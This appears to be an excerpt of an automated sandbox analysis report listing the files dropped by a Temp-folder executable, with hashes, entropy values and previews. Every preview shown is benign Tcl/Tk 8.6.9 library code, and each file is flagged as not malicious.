                                                                                                                                                                                                                                                                                                                                Preview:namespace eval ::tk {. ::msgcat::mcset sv "&Abort" "&Avsluta". ::msgcat::mcset sv "&About..." "&Om...". ::msgcat::mcset sv "All Files" "Samtliga filer". ::msgcat::mcset sv "Application Error" "Programfel". ::msgcat::mcset sv "&Blue" "&Bl\u00e5". ::msgcat::mcset sv "Cancel" "Avbryt". ::msgcat::mcset sv "&Cancel" "&Avbryt". ::msgcat::mcset sv "Cannot change to the directory \"%1\$s\".\nPermission denied." "Kan ej n\u00e5 mappen \"%1\$s\".\nSaknar r\u00e4ttigheter.". ::msgcat::mcset sv "Choose Directory" "V\u00e4lj mapp". ::msgcat::mcset sv "Cl&ear" "&Radera". ::msgcat::mcset sv "&Clear Console" "&Radera konsollen". ::msgcat::mcset sv "Color" "F\u00e4rg". ::msgcat::mcset sv "Console" "Konsoll". ::msgcat::mcset sv "&Copy" "&Kopiera". ::msgcat::mcset sv "Cu&t" "Klipp u&t". ::msgcat::mcset sv "&Delete" "&Radera". ::msgcat::mcset sv "Details >>" "Detaljer >>". ::msgcat::mcset sv "Directory \"%1\$s\" does not exist." "Mappen \"%1\$s\" finns
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):5594
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.9941618573215525
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:oz4CrtmsXVwM3Er4VAEQ93NZB1o+IFF5ZYi4GUoLf33yLLddzA:oUCrtmsFREEs999o7FF5ZYi4GjLfS/d2
                                                                                                                                                                                                                                                                                                                                MD5:7763C90F811620A6C1F0A36BAF9B89CA
                                                                                                                                                                                                                                                                                                                                SHA1:30E24595DD683E470FE9F12814D27D6D266B511E
                                                                                                                                                                                                                                                                                                                                SHA-256:F6929A5E0D18BC4C6666206C63AC4AAA66EDC4B9F456DFC083300CFA95A44BCD
                                                                                                                                                                                                                                                                                                                                SHA-512:2E2887392C67D05EA85DB2E6BFD4AA27779BC82D3B607A7DD221A99EFF0D2A21A6BA47A4F2D2CDFC7CFECD7E93B2B38064C4D5A51406471AE142EC9CC71F5C48
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# obsolete.tcl --.#.# This file contains obsolete procedures that people really shouldn't.# be using anymore, but which are kept around for backward compatibility..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# The procedures below are here strictly for backward compatibility with.# Tk version 3.6 and earlier. The procedures are no longer needed, so.# they are no-ops. You should not use these procedures anymore, since.# they may be removed in some future release...proc tk_menuBar args {}.proc tk_bindForTraversal args {}..# ::tk::classic::restore --.#.# Restore the pre-8.5 (Tk classic) look as the widget defaults for classic.# Tk widgets..#.# The value following an 'option add' call is the new 8.5 value..#.namespace eval ::tk::classic {. # This may need to be adjusted for some windo
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):1586
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.733749898743743
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:48:k2hguC4Zxk+Z0cIWR3afbR1EIC+KtVa+6WX13jZQl9:k6T9N3atqIkeS9FQD
                                                                                                                                                                                                                                                                                                                                MD5:D17FE676A057F373B44C9197114F5A69
                                                                                                                                                                                                                                                                                                                                SHA1:9745C83EEC8565602F8D74610424848009FFA670
                                                                                                                                                                                                                                                                                                                                SHA-256:76DBDBF9216678D48D1640F8FD1E278E7140482E1CAC7680127A9A425CC61DEE
                                                                                                                                                                                                                                                                                                                                SHA-512:FF7D9EB64D4367BB11C567E64837CB1DAAA9BE0C8A498CAD00BF63AF45C1826632BC3A09E65D6F51B26EBF2D07285802813ED55C5D697460FC95AF30A943EF8F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# optMenu.tcl --.#.# This file defines the procedure tk_optionMenu, which creates.# an option button and its associated menu..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_optionMenu --.# This procedure creates an option button named $w and an associated.# menu. Together they provide the functionality of Motif option menus:.# they can be used to select one of many values, and the current value.# appears in the global variable varName, as well as in the text of.# the option menubutton. The name of the menu is returned as the.# procedure's result, so that the caller can use it to change configuration.# options on the menu or otherwise manipulate it..#.# Arguments:.# w -...The name to use for the menubutton..# varName -..Global variable to hold the currently selected value..# first
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):8174
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.9180898441277705
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:ZUW5yUd51URCJWgWWWuWVWUKoDOdnAjLDlJymGH91QOW86vkQI:ZLXaCI3dFUlPdnAP69W89
                                                                                                                                                                                                                                                                                                                                MD5:ABE618A0891CD6909B945A2098C77D75
                                                                                                                                                                                                                                                                                                                                SHA1:A322CCFB33FF73E4A4730B5B21DE4290F9D94622
                                                                                                                                                                                                                                                                                                                                SHA-256:60B8579368BB3063F16D25F007385111E0EF8D97BB296B03656DC176E351E3CA
                                                                                                                                                                                                                                                                                                                                SHA-512:2DF5A50F3CA7D21F43651651879BCAE1433FF44B0A7ECE349CCF73BECC4780160125B21F69348C97DCD60503FC79A6525DB723962197E8550B42D0AE257FD8E7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# palette.tcl --.#.# This file contains procedures that change the color palette used.# by Tk..#.# Copyright (c) 1995-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_setPalette --.# Changes the default color scheme for a Tk application by setting.# default colors in the option database and by modifying all of the.# color options for existing widgets that have the default value..#.# Arguments:.# The arguments consist of either a single color name, which.# will be used as the new background color (all other colors will.# be computed from this) or an even number of values consisting of.# option names and values. The name for an option is the one used.# for the option database, such as activeForeground, not -activeforeground...proc ::tk_setPalette {args} {. if {[winfo depth .] == 1} {..# Just return on monochrome displays, otherwise errors will occur..return. }.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):5176
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.933519639131517
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:PmpWHrga3awUrH6kdX3pBz6tkm71cHXYV23EmkiYlgfY8:+pWHrP36r6kJ3pBetkm6HXVUmPYlgfY8
                                                                                                                                                                                                                                                                                                                                MD5:2DA0A23CC9D6FD970FE00915EA39D8A2
                                                                                                                                                                                                                                                                                                                                SHA1:DFE3DC663C19E9A50526A513043D2393869D8F90
                                                                                                                                                                                                                                                                                                                                SHA-256:4ADF738B17691489C71C4B9D9A64B12961ADA8667B81856F7ADBC61DFFEADF29
                                                                                                                                                                                                                                                                                                                                SHA-512:B458F3D391DF9522D4E7EAE8640AF308B4209CE0D64FD490BFC0177FDE970192295C1EA7229CE36D14FC3E582C7649460B8B7B0214E0FF5629B2B430A99307D4
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# panedwindow.tcl --.#.# This file defines the default bindings for Tk panedwindow widgets and.# provides procedures that help in implementing those bindings...bind Panedwindow <Button-1> { ::tk::panedwindow::MarkSash %W %x %y 1 }.bind Panedwindow <Button-2> { ::tk::panedwindow::MarkSash %W %x %y 0 }..bind Panedwindow <B1-Motion> { ::tk::panedwindow::DragSash %W %x %y 1 }.bind Panedwindow <B2-Motion> { ::tk::panedwindow::DragSash %W %x %y 0 }..bind Panedwindow <ButtonRelease-1> {::tk::panedwindow::ReleaseSash %W 1}.bind Panedwindow <ButtonRelease-2> {::tk::panedwindow::ReleaseSash %W 0}..bind Panedwindow <Motion> { ::tk::panedwindow::Motion %W %x %y }..bind Panedwindow <Leave> { ::tk::panedwindow::Leave %W }..# Initialize namespace.namespace eval ::tk::panedwindow {}..# ::tk::panedwindow::MarkSash --.#.# Handle marking the correct sash for possible dragging.#.# Arguments:.# w..the widget.# x..widget local x coord.# y..widget local y coord.# proxy.whether this should be a prox
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):363
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.977735142707899
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:6:Cjtl17nOJRVxTc6ynID/cL44ncleXNyLMQ9HECJBIQ08PbDMQ9HECJBIQem8:ot7rOJdg6LYUlVfBIUjjfBIFF
                                                                                                                                                                                                                                                                                                                                MD5:A6448AF2C8FAFC9A4F42EACA6BF6AB2E
                                                                                                                                                                                                                                                                                                                                SHA1:0B295B46B6DF906E89F40A907022068BC6219302
                                                                                                                                                                                                                                                                                                                                SHA-256:CD44EE7F76C37C0C522BD0CFCA41C38CDEDDC74392B2191A3AF1A63D9D18888E
                                                                                                                                                                                                                                                                                                                                SHA-512:5B1A8CA5B09B7281DE55460D21D5195C4EE086BEBDC35FA561001181490669FFC67D261F99EAA900467FE97E980EB733C5FFBF9D8C541EDE18992BF4A435C749
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:if {[catch {package present Tcl 8.6.0}]} { return }.if {($::tcl_platform(platform) eq "unix") && ([info exists ::env(DISPLAY)]..|| ([info exists ::argv] && ("-display" in $::argv)))} {. package ifneeded Tk 8.6.9 [list load [file join $dir .. .. bin libtk8.6.dll] Tk].} else {. package ifneeded Tk 8.6.9 [list load [file join $dir .. .. bin tk86t.dll] Tk].}.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7381
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.833263771361282
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:keEoaa0QfsimXZrjpgj47e5QeO9uMfUKvLAN6Zo:keEoRHsiWddgkoiUeG
                                                                                                                                                                                                                                                                                                                                MD5:EFC567E407C48BF2BE4E09CB18DEFC11
                                                                                                                                                                                                                                                                                                                                SHA1:EDEDB6776963B7D629C6ACE9440D24EB78DEA878
                                                                                                                                                                                                                                                                                                                                SHA-256:9708F5A1E81E1C3FEAF189020105BE28D27AA8808FF9FB2DCCA040500CF2642A
                                                                                                                                                                                                                                                                                                                                SHA-512:BDA5F92BD2F7B9CD29C5A732EC77A71291778A0EC3EABE81575C55DE3E207F663BA28DA4C95174045A74EFFF71B95D907C9D056BAA9E585E6F6DC14A133760BC
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# safetk.tcl --.#.# Support procs to use Tk in safe interpreters..#.# Copyright (c) 1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES...# see safetk.n for documentation..#.#.# Note: It is now ok to let untrusted code being executed.# between the creation of the interp and the actual loading.# of Tk in that interp because the C side Tk_Init will.# now look up the master interp and ask its safe::TkInit.# for the actual parameters to use for it's initialization (if allowed),.# not relying on the slave state..#..# We use opt (optional arguments parsing).package require opt 0.4.1;..namespace eval ::safe {.. # counter for safe toplevels. variable tkSafeId 0.}..#.# tkInterpInit : prepare the slave interpreter for tk loading.# most of the real job is done by loadTk.# returns the slave name (tkInterpInit does).#.proc ::safe::tkInterpIni
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):7766
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.933555104215445
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:q1xTLI9LUAp8cZIQ+Umuy9vYE2dLTaQfiwHZeABypyTtB:HUN1Umn2dKuHIpCB
                                                                                                                                                                                                                                                                                                                                MD5:1CE32CDAEB04C75BFCEEA5FB94B8A9F0
                                                                                                                                                                                                                                                                                                                                SHA1:CC7614C9EADE999963EE78B422157B7B0739894C
                                                                                                                                                                                                                                                                                                                                SHA-256:58C662DD3D2C653786B05AA2C88831F4E971B9105E4869D866FB6186E83ED365
                                                                                                                                                                                                                                                                                                                                SHA-512:1EE5A187615AE32F17936931B30FEA9551F9E3022C1F45A2BCA81624404F4E68022FCF0B03FBD61820EC6958983A8F2FBFC3AD2EC158433F8E8DE9B8FCF48476
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# scale.tcl --.#.# This file defines the default bindings for Tk scale widgets and provides.# procedures that help in implementing the bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1995 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for entries..#-------------------------------------------------------------------------..# Standard Motif bindings:..bind Scale <Enter> {. if {$tk_strictMotif} {..set tk::Priv(activeBg) [%W cget -activebackground]..%W configure -activebackground [%W cget -background]. }. tk::ScaleActivate %W %x %y.}.bind Scale <Motion> {. tk::ScaleActivate %W %x %y.}.bind Scale <Leave> {. if {$tk_strictMotif} {..%W configure -activebackground $tk::Priv(activeBg). }.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):12748
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.026700023745507
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:AfVS+eV9fKbBevrpQQtfJMZqSwiXEfY4yhIa7yLIVNpIgdWmD3T1gFpN:Pf4wTGOfmkSwORVqaGcV4q7kpN
                                                                                                                                                                                                                                                                                                                                MD5:4CBFFC4E6B3F56A5890E3F7C31C6C378
                                                                                                                                                                                                                                                                                                                                SHA1:75DB5205B311F55D1CA1D863B8688A628BF6012A
                                                                                                                                                                                                                                                                                                                                SHA-256:6BA3E2D62BD4856D7D7AE87709FCAA23D81EFC38C375C6C5D91639555A84C35D
                                                                                                                                                                                                                                                                                                                                SHA-512:65DF7AE09E06C200A8456748DC89095BB8417253E01EC4FDAFB28A84483147DDC77AAF6B49BE9E18A326A94972086A99044BEE3CE5CF8026337DFC6972C92C04
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# scrlbar.tcl --.#.# This file defines the default bindings for Tk scrollbar widgets..# It also provides procedures that help in implementing the bindings..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# The code below creates the default class bindings for scrollbars..#-------------------------------------------------------------------------..# Standard Motif bindings:.if {[tk windowingsystem] eq "x11" || [tk windowingsystem] eq "aqua"} {..bind Scrollbar <Enter> {. if {$tk_strictMotif} {..set tk::Priv(activeBg) [%W cget -activebackground]..%W configure -activebackground [%W cget -background]. }. %W activate [%W identify %x %y].}.bind Scrollbar <Motion> {. %W activate [%W identify %x %y].}..# The
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):15640
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.001694129885997
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:192:aR1yvxxVRQRrclOniQ14Yvg5bbVFMio1UF9w9P75uaMY+c6RhO1ON6Ql4qRiZ0NO:MyF5XVF61iwZ75/YRhO464z8wdEt
                                                                                                                                                                                                                                                                                                                                MD5:9971530F110AC2FB7D7EC91789EA2364
                                                                                                                                                                                                                                                                                                                                SHA1:AB553213C092EF077524ED56FC37DA29404C79A7
                                                                                                                                                                                                                                                                                                                                SHA-256:5D6E939B44F630A29C4FCB1E2503690C453118607FF301BEF3C07FA980D5075A
                                                                                                                                                                                                                                                                                                                                SHA-512:81B4CEC39B03FBECA59781AA54960F0A10A09733634F401D5553E1AAA3EBF12A110C9D555946FCDD70A9CC897514663840745241AD741DC440BB081A12DCF411
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# spinbox.tcl --.#.# This file defines the default bindings for Tk spinbox widgets and provides.# procedures that help in implementing those bindings. The spinbox builds.# off the entry widget, so it can reuse Entry bindings and procedures..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1999-2000 Jeffrey Hobbs.# Copyright (c) 2000 Ajuba Solutions.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for example,.#...start dragging out a
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):20270
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.749624735829406
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:edtm3fv2ZzffGIgowSDxD7n2s7AcBnaUuFyLWFot5gzSG3k96vNTWuoJnfOvWhbk:eds3fv2ZzffGIgowSDxD7nd7AcBnahFN
                                                                                                                                                                                                                                                                                                                                MD5:4AD192C43972A6A4834D1D5A7C511750
                                                                                                                                                                                                                                                                                                                                SHA1:09CA39647AA1C14DB16014055E48A9B0237639BA
                                                                                                                                                                                                                                                                                                                                SHA-256:8E8ECECFD6046FE413F37A91933EEA086E31959B3FBEB127AFDD05CD9141BE9A
                                                                                                                                                                                                                                                                                                                                SHA-512:287FAADBC6F65FCC3EA9C1EC10B190712BB36A06D28E59F8D268EA585B4E6B13494BA111DFF6AC2EBF998578999C9C36965C714510FC21A9ACB65FF9B75097CB
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# Tcl autoload index file, version 2.0.# This file is generated by the "auto_mkindex" command.# and sourced to set up indexing information for one or.# more commands. Typically each line is a command that.# sets an element in the auto_index array, where the.# element name is the name of a command and the value is.# a script that loads the command...set auto_index(::tk::dialog::error::Return) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::Details) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::SaveToLog) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::Destroy) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::dialog::error::bgerror) [list source [file join $dir bgerror.tcl]].set auto_index(bgerror) [list source [file join $dir bgerror.tcl]].set auto_index(::tk::ButtonInvoke) [list source [file join $dir button.tcl]].set auto_index(::tk::ButtonAutoInvoke) [list source [file join
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):5142
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.672280480827932
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:96:MgPXEnPQcTtD7zxeHK7ijhgdhAhbbjymL/KK2pLQY4QYNHL43EwzS6ejW:MgPUnPtTtFeqmjhgdhIbbjymL/KKeLQW
                                                                                                                                                                                                                                                                                                                                MD5:214FA0731A27E33826F2303750B64784
                                                                                                                                                                                                                                                                                                                                SHA1:C2DA41761FB7BAE38DDDEFA22AB57B337F54F5D8
                                                                                                                                                                                                                                                                                                                                SHA-256:FB6B35ECB1438BB8A2D816B86FB0C55500C6EA8D24AECB359CC3C7D3B3C54DE0
                                                                                                                                                                                                                                                                                                                                SHA-512:2E2A2412CBB090C0728333480B0E07C85087ED932974A235D5BC8C9725DE937520205D988872E1B5BEFA1E80201E046C500BC875A5CBD584A5099930EBBD115A
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# tearoff.tcl --.#.# This file contains procedures that implement tear-off menus..#.# Copyright (c) 1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk::TearoffMenu --.# Given the name of a menu, this procedure creates a torn-off menu.# that is identical to the given menu (including nested submenus)..# The new torn-off menu exists as a toplevel window managed by the.# window manager. The return value is the name of the new menu..# The window is created at the point specified by x and y.#.# Arguments:.# w -...The menu to be torn-off (duplicated)..# x -...x coordinate where window is created.# y -...y coordinate where window is created..proc ::tk::TearOffMenu {w {x 0} {y 0}} {. # Find a unique name to use for the torn-off menu. Find the first. # ancestor of w that is a toplevel but not a menu,
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):33155
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.908284262811967
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:ThZXGSuWlNGbyBFFRzGagUNKEFx8wredkG/gVVFaO/9bembFWaHnla98ffRiqiPp:TYaNGKF6uNdyO4Ona98ffRUAlde
                                                                                                                                                                                                                                                                                                                                MD5:03CC27E28E0CFCE1B003C3E936797AB0
                                                                                                                                                                                                                                                                                                                                SHA1:C7FE5AE7F35C86EC3724F6A111EAAF2C1A18ABE9
                                                                                                                                                                                                                                                                                                                                SHA-256:BCCC1039F0EB331C4BB6BD5848051BB745F242016952723478C93B009F63D254
                                                                                                                                                                                                                                                                                                                                SHA-512:5091B10EE8446E6853EF7060EC13AB8CADA0D6448F9081FEBD07546C061F69FC273BBF23BA7AF05D8359E618DD68A5C27F0453480FE3F26E744DB19BFCD115C7
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# text.tcl --.#.# This file defines the default bindings for Tk text widgets and provides.# procedures that help in implementing the bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..# Copyright (c) 1998 by Scriptics Corporation..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of ::tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# char -..Character position on the line; kept in order.#...to allow moving up or down past short lines while.#...still remembering the desired position..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for exampl
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):23142
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.097142507145225
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:dmAlIQ7ylH462gngqeObubqLwvoGah0QSA4jLGn3WB0MCdPAWD+g190K5TzMSW4d:dmOIQulHokh0QzMemB0MCD+g1bk+
                                                                                                                                                                                                                                                                                                                                MD5:3250EC5B2EFE5BBE4D3EC271F94E5359
                                                                                                                                                                                                                                                                                                                                SHA1:6A0FE910041C8DF4F3CDC19871813792E8CC4E4C
                                                                                                                                                                                                                                                                                                                                SHA-256:E1067A0668DEBB2D8E8EC3B7BC1AEC3723627649832B20333F9369F28E4DFDBF
                                                                                                                                                                                                                                                                                                                                SHA-512:F8E403F3D59D44333BCE2AA7917E6D8115BEC0FE5AE9A1306F215018B05056467643B7AA228154DDCED176072BC903DFB556CB2638F5C55C1285C376079E8FE3
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# tk.tcl --.#.# Initialization script normally executed in the interpreter for each Tk-based.# application. Arranges class bindings for widgets..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1996 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Ajuba Solutions..#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES...# Verify that we have Tk binary and script components from the same release.package require -exact Tk 8.6.9...# Create a ::tk namespace.namespace eval ::tk {. # Set up the msgcat commands. namespace eval msgcat {..namespace export mc mcmax. if {[interp issafe] || [catch {package require msgcat}]} {. # The msgcat package is not available. Supply our own. # minimal replacement.. proc mc {src args} {. return [format $src {*}$args]. }. proc mcmax {args} {.
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):38373
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):5.143151103117394
                                                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                                                SSDEEP:384:a6NFLvIIaE2wCpxQYt/rJTkA3NN5YAGnk1c6gHZZgkO0Z6INfdpsaUpWz8ZlhL5S:akJ2wKFXuNzClMGH87f12Vb4
                                                                                                                                                                                                                                                                                                                                MD5:21985684C432CB918A3E862517842F75
                                                                                                                                                                                                                                                                                                                                SHA1:4DBACAEEF8454C1B08993D76857C5F09AA75405A
                                                                                                                                                                                                                                                                                                                                SHA-256:AE448DF6FDBBA45D450ABEFEF12799F8362177B0B9FE06F3CA3CB0EDA5E6AA58
                                                                                                                                                                                                                                                                                                                                SHA-512:AFEA6C47001455D7E40A5A7728FA4DFAD7BB66B02191E807BB15355847F5B265DEEE6015516807B10E1273710A3D03FAAC7856CB16EFA773813105B23A11960F
                                                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                                                Preview:# tkfbox.tcl --.#.#.Implements the "TK" standard file selection dialog box. This dialog.#.box is used on the Unix platforms whenever the tk_strictMotif flag is.#.not set..#.#.The "TK" standard file selection dialog box is similar to the file.#.selection dialog box on Win95(TM). The user can navigate the.#.directories by clicking on the folder icons or by selecting the.#."Directory" option menu. The user can select files by clicking on the.#.file icons or by entering a filename in the "Filename:" entry..#.# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::file {. namespace import -force ::tk::msgcat::*. variable showHiddenBtn 0. variable showHiddenVar 1.. # Create the images if they did not already exist.. if {![info exists ::tk::Priv(updirImage)]} {..set ::tk::Priv(updirImage)
                                                                                                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\A19A.exe
                                                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                                                Size (bytes):3683
                                                                                                                                                                                                                                                                                                                                Entropy (8bit):4.872530668776095
                                                                                                                                                                                                                                                                                                                                Encrypted:false
